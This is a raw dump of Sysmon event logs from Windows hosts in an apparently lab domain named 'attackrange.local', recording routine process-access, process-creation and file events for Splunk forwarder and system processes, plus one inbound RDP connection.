09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980827Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980826Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980825Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8D19-6151-0B7A-00000000FD01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980824Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.099{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D19-6151-0B7A-00000000FD01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980823Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.069{69CF5F33-8D19-6151-0B7A-00000000FD01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.973{5EBD8912-8D1A-6151-7E00-00000000FD01}20601984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.926{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DBC83129CFC70A23D85D8969735192D,SHA256=905FDDCAB5CA198BDDACCD295AF04F44999C67293323437E1B9F4D94D4A9057F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980839Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:30.740{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7105E0307E7DC6BAC3410A308EB03F73,SHA256=4DAF1864E13FF7E8B43B5746F66102E0BC4C5C8D491E63ED6A66C1AB72E54D61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D1A-6151-7E00-00000000FD01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D1A-6151-7E00-00000000FD01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.754{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D1A-6151-7E00-00000000FD01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.755{5EBD8912-8D1A-6151-7E00-00000000FD01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:28.872{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63662-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001054971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.176{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FCFB84EFDFF312347160E6DDC169917,SHA256=E2FDCEDD267B14F55A99567A4CA666A78F26851D4CD13AE7B811C7772C75214B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:30.176{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76D14D796EB881BDA27E95A285DBC6AA,SHA256=99673A2D8B4D26726C6A3CD15601C2083AE608DBB9E6785E77526E0B0B1C8C0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.927{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98273684FBE614595CC34C4C1E2CE5A3,SHA256=F970722F0F497C3C9F947705114B1A0790C4B7A047479E4E04A884BABAB769AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980841Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:31.974{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E03943ECDBBABB92A333E6BD8E36E561,SHA256=313075DB393B5C7DCA30ABE2941389853169F0F84BE84AFF219C2E6C2A578995,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.770{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FCFB84EFDFF312347160E6DDC169917,SHA256=E2FDCEDD267B14F55A99567A4CA666A78F26851D4CD13AE7B811C7772C75214B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D1B-6151-7F00-00000000FD01}2644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 